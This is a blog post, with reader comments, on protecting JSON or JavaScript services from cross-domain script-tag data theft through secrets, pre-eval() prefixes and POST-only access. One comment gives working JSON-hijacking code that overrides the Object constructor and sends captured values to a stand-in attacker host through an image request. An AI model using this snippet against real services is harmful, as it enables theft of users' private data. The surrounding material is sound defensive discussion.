How to Protect a JSON or Javascript Service

There have been lots of explanations recently of the dangers of JSON or JavaScript remoting. This post is about what you can do to protect your scripts.

The Problem

The issues have been explained before, so I'm going to assume some knowledge of the problem. If you're not sure, some stuff to read:

The Solutions

So what are the solutions? I think there are 3 options. Each has its pros and cons:

  1. Use a Secret in the Request
  2. Force pre-eval() Processing
  3. Force POST requests

This post is a shortened version of the detailed description of what DWR does. If you are interested in the options DWR takes and how you can configure them, you should read that page.

1. Use a Secret in the Request

If you can only support one of these protections, this is the one to choose. Including a secret in the request allows the server to reject the request as invalid before any actions take place. It is common to include the secret in the URL, however this is a slightly vulnerable position for a secret since a query string is likely to turn up in web server log files, Referer headers and so on. A request header or the POST body is a better place for it.

It is possible to use cookie values like PHPSESSID or JSESSIONID, read using JavaScript, as the secret. The point is that the secret must be copied into the request by script running in your page: browsers attach cookies to a cross-domain <script> request automatically, so the cookie arriving by itself proves nothing, but the browser's same-origin policy should prevent an attacker's page from reading the cookie and echoing it back. However this method will stop working as people begin to switch to using HttpOnly cookies, which are invisible to document.cookie. So it is better to start with a separate secret.

2. Force pre-eval() Processing

Since <script> tag remoting does not allow you to process the JSON or JavaScript before it is eval()ed, you can protect your JSON by forcing it to be manipulated before eval(). A legitimate client that fetches the data using XHR or an iframe has the raw text and can strip the protection; a cross-domain <script> include only gets whatever the script engine makes of the body as-is. All 3 of these techniques will prevent your response from being pure JSON, however you may rank security above purity. There are 3 ways to do this:

  • Wrap the JSON in a comment. For example, /* { 'data':'protected' } */. When this is eval()ed, there will be no result, however if you have fetched the data using XHR or iframe, you can do some string manipulation before eval() to remove the leading /* and trailing */.
    This method is good for plain JSON, however if you are using Javascript which could contain /* comments */, then you should not use this technique because comments in Javascript do not nest.
  • Prefix the script with 'while(1);'. Since this is an infinite loop, it causes browsers to hang, and maybe give an error message. Either way the data that follows it never gets executed.
    There is a potential vulnerability that some browser may allow you to override the action of while using something like this: 'function while() {}'. However I don't know of any such browser.
    Google use this method to protect data in GMail. 'while(1);' is possibly better than 'while(true);' in case there are any browsers that allow you to redefine truth.
  • Prefix the script with 'throw new Error("message");'. This is a neat solution in that it allows you to explain what is wrong to users that get the message by mistake. DWR uses this method.
    It is potentially vulnerable to some browser allowing an attacker to redefine the Error or String constructors to prevent the throw from happening, however this does not work on any browser that I know of, and it's hard to see how it could happen.
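The three prefixes above, as an added example that is not code from the post or from DWR: the server applies one of them around the serialised JSON, the legitimate client (which has the raw text, because it used XHR or an iframe) checks for the expected prefix, strips it and parses the remainder, and a small simulation shows what a cross-domain <script> include would get instead. The function names, the error message in the throw prefix and the sample payload are this example's own assumptions.

```javascript
// Added example, not code from the post or from DWR: the three pre-eval()
// prefixes described above, applied on the server and stripped again by the
// legitimate client before parsing. Function names here are this example's own.

const PREFIXES = {
  comment: { open: '/*', close: '*/' },
  loop: { open: 'while(1);', close: '' },
  throw: { open: 'throw new Error("Direct access to this resource is not allowed");', close: '' },
};

// Server side: serialise the data and apply one of the three protections.
function protect(data, mode) {
  const p = PREFIXES[mode];
  if (!p) throw new Error('unknown protection mode: ' + mode);
  const json = JSON.stringify(data);
  // JavaScript comments do not nest: a "*/" inside the payload would close the
  // wrapper early and leave the rest of the body as live script, so refuse it.
  if (mode === 'comment' && json.indexOf('*/') !== -1) {
    throw new Error('payload contains "*/"; use the loop or throw prefix instead');
  }
  return p.open + json + p.close;
}

// Client side (XHR or iframe transport, where the raw text is available):
// verify the expected prefix and suffix, strip them, and parse what remains
// with JSON.parse rather than eval(). An unexpected shape is an error, not
// something to evaluate anyway.
function unprotect(text, mode) {
  const p = PREFIXES[mode];
  if (!p) throw new Error('unknown protection mode: ' + mode);
  const hasPrefix = text.slice(0, p.open.length) === p.open;
  const hasSuffix = p.close === '' || text.slice(text.length - p.close.length) === p.close;
  if (!hasPrefix || !hasSuffix) {
    throw new Error('response did not carry the expected "' + mode + '" protection');
  }
  return JSON.parse(text.slice(p.open.length, text.length - p.close.length));
}

// What a cross-domain <script src="..."> include gets: the body runs as a
// script with no chance to edit it first. Simulated here with Function(); the
// while(1) variant is deliberately not run because it would hang this process
// just as it hangs the attacker's page.
function simulateScriptTag(body) {
  if (body.indexOf('while(1);') === 0) {
    return { executed: false, error: 'would hang: infinite loop before the data' };
  }
  try {
    new Function(body)();
    return { executed: true };
  } catch (e) {
    return { executed: false, error: e.message };
  }
}
```

Running `simulateScriptTag` on the unprotected body reports that it executed, on the throw-prefixed body that it aborted with the error message, and on the comment-wrapped body that it ran but evaluated nothing (the whole payload is a comment). Only `unprotect`, which knows which prefix to expect, ever hands the data to JSON.parse.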

3. Force POST Requests

Since browsers use GET to process <script> tags, you can prevent <script> tags from working by denying GET requests for the resource. This is the most common solution, however it is also perhaps the weakest.

Firstly XHR-POST doesn't work with older versions of Safari, so some support for GET is often useful.

More importantly future versions of Firefox are touted to include cross-domain XHR support. While we don't have exact knowledge of how this will happen, it would be foolish to base your security plans on this technique holding up.

Finally, we're working in an environment where new possibilities are popping up every day - betting your security on a system that works more by fluke than design isn't a great idea in my opinion.

By default DWR denies GET requests for belt and braces security, however this is customizable to allow support for older versions of Safari.



Re: How to Protect a JSON or Javascript Service

As for hiding a secret in the request, how about doing it via basic HTTP authentication? That will keep URLs sane, and provide a nice log in the server of attempts at access, as well as keep the secret out of the server. HTTP authentication has (rightfully) been avoided in the past because browser UI support is lacking, and because writing a CGI on Apache that does its own authentication seems impossible. However, going over XHR, no UI is needed, and other frameworks are making it possible to programmatically send a response code other than "200 OK."

Re: How to Protect a JSON or Javascript Service

I'm trying to wrap my head around what a DWR response looks like ... isn't the response a text/html mimetype, with a <script> tag that contains the JSON to be eval'ed? In which case an external <script src="" /> shouldn't be able to parse the payload because it would be: 1) of the wrong mimetype: text/html vs application/x-javascript 2) start out with a <script> tag which isn't valid executable JavaScript. Or did you find that despite 1) and 2) browsers still manage to parse such a payload?

Re: How to Protect a JSON or Javascript Service

DWR's response doesn't have a script tag because it doesn't need one. You are right that if it was there, it would prevent the request from executing. The 'throws' prefix is what we do to stop that happening. DWR operates in many different modes (iframe/xhr/script-tag) so the exact form of the response varies. The most at-risk version is pure Javascript.

Re: How to Protect a JSON or Javascript Service

Do I miss something? If I'm using code like this:

    var toSteal = [];
    var idx = 0;

    function steal(key) {
        toSteal[key]['killme'] = 0;
    }

    function Object() {
        var obj = this;
        var curr = idx++;
        toSteal[curr] = obj;
        // define a setter for the killme property
        this.__defineSetter__('killme', function(x) {
            for (key in obj) {
                if (key != 'killme') {
                    //alert('Data stolen from array: ' + key + '=' + obj[key]);
                    document.images[0].src = "http://attackersSite:8080/webservice/login?data=" + key + ":::" + obj[key];
                }
            }
        });
        // Steal the data when the JSON parse is done
        setTimeout('steal(' + curr + ')', 0);
    }

The line:

    document.images[0].src = "http://attackersSite:8080/webservice/login?data=" + key + ":::" + obj[key];

sends a GET with the JSON data to the attacker's server. I set up a little web service which handles the GET and writes the data into a text file. In the text file I can see/read that the JSON data is prefixed with "while(1);". With this information I can use my web service to cut off the "while(1);" before eval()ing it. Am I missing something, or is this possible as I describe?

Re: How to Protect a JSON or Javascript Service

Instead of while(1);, why not just create a simple syntax error? So, for example, print "~" at the start of the file. It's invalid javascript, and it saves a few bytes and makes the replacement smaller. Slightly better, no?

Re: How to Protect a JSON or Javascript Service

The GWT team (http://groups.google.com/group/Google-Web-Toolkit/web/security-for-gwt-applications) has published an article on Security for GWT Applications that delves into how GWT handles JavaScript vulnerabilities such as leaking data, cross-site scripting, forging requests, JSON and XSRF.
